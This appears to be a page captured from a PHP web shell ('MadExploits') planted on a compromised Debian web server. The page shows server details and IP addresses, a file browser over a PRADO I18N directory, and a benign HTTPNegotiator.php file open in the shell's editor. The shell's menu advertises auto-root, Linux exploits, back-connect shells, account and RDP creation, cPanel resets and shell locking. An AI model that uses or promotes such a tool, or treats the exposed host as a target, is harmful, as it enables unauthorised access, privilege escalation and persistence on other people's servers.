Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.129.216.248
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
framework /
I18N /
core /
[ HOME SHELL ]
Name
Size
Permission
Action
Gettext
[ DIR ]
drwxr-xr-x
data
[ DIR ]
drwxr-xr-x
ChoiceFormat.php
6.19
KB
-rw-r--r--
CultureInfo.php
15.57
KB
-rw-r--r--
DateFormat.php
15.73
KB
-rw-r--r--
DateTimeFormatInfo.php
14.49
KB
-rw-r--r--
HTTPNegotiator.php
2.97
KB
-rw-r--r--
IMessageSource.php
3.77
KB
-rw-r--r--
MessageCache.php
3.88
KB
-rw-r--r--
MessageFormat.php
6.13
KB
-rw-r--r--
MessageSource.php
8.8
KB
-rw-r--r--
MessageSource_Database.php
9.02
KB
-rw-r--r--
MessageSource_MySQL.php
9.96
KB
-rw-r--r--
MessageSource_SQLite.php
8.57
KB
-rw-r--r--
MessageSource_XLIFF.php
12.75
KB
-rw-r--r--
MessageSource_gettext.php
10.84
KB
-rw-r--r--
NumberFormat.php
7.92
KB
-rw-r--r--
NumberFormatInfo.php
16.75
KB
-rw-r--r--
TCache_Lite.php
17.58
KB
-rw-r--r--
util.php
5.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : HTTPNegotiator.php
<?php /** * HTTPNegotiator class file. * * This program is free software; you can redistribute it and/or modify * it under the terms of the BSD License. * * Copyright(c) 2004 by Qiang Xue. All rights reserved. * * To contact the author write to {@link mailto:qiang.xue@gmail.com Qiang Xue} * The latest version of PRADO can be obtained from: * {@link http://prado.sourceforge.net/} * * @author Wei Zhuo <weizhuo[at]gmail[dot]com> * @version $Revision: 1.2 $ $Date: 2005/01/05 03:15:14 $ * @package System.I18N.core */ /** * Include the CultureInfo class. */ require_once(dirname(__FILE__).'/CultureInfo.php'); /** * HTTPNegotiator class. * * Get the language and charset information from the client browser. * * @author Xiang Wei Zhuo <weizhuo[at]gmail[dot]com> * @version v1.0, last update on Fri Dec 24 16:01:35 EST 2004 * @package System.I18N.core */ class HTTPNegotiator { /** * A list of languages accepted by the browser. * @var array */ protected $languages; /** * A list of charsets accepted by the browser * @var array */ protected $charsets; /** * Get a list of languages acceptable by the client browser * @return array languages ordered in the user browser preferences. */ function getLanguages() { if($this->languages !== null) { return $this->languages; } $this->languages = array(); if (!isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) return $this->languages; //$basedir = CultureInfo::dataDir(); //$ext = CultureInfo::fileExt(); $info = new CultureInfo(); foreach(explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $lang) { // Cut off any q-value that might come after a semi-colon if ($pos = strpos($lang, ';')) $lang = trim(substr($lang, 0, $pos)); if (strstr($lang, '-')) { $codes = explode('-',$lang); if($codes[0] == 'i') { // Language not listed in ISO 639 that are not variants // of any listed language, which can be registerd with the // i-prefix, such as i-cherokee if(count($codes)>1) $lang = $codes[1]; } else { for($i = 0, $k = count($codes); $i<$k; ++$i) { if($i == 0) $lang = strtolower($codes[0]); else $lang .= '_'.strtoupper($codes[$i]); } } } if($info->validCulture($lang)) $this->languages[] = $lang; } return $this->languages; } /** * Get a list of charsets acceptable by the client browser. * @return array list of charsets in preferable order. */ function getCharsets() { if($this->charsets !== null) { return $this->charsets; } $this->charsets = array(); if (!isset($_SERVER['HTTP_ACCEPT_CHARSET'])) return $this->charsets; foreach (explode(',', $_SERVER['HTTP_ACCEPT_CHARSET']) as $charset) { if (!empty($charset)) $this->charsets[] = preg_replace('/;.*/', '', $charset); } return $this->charsets; } }
Close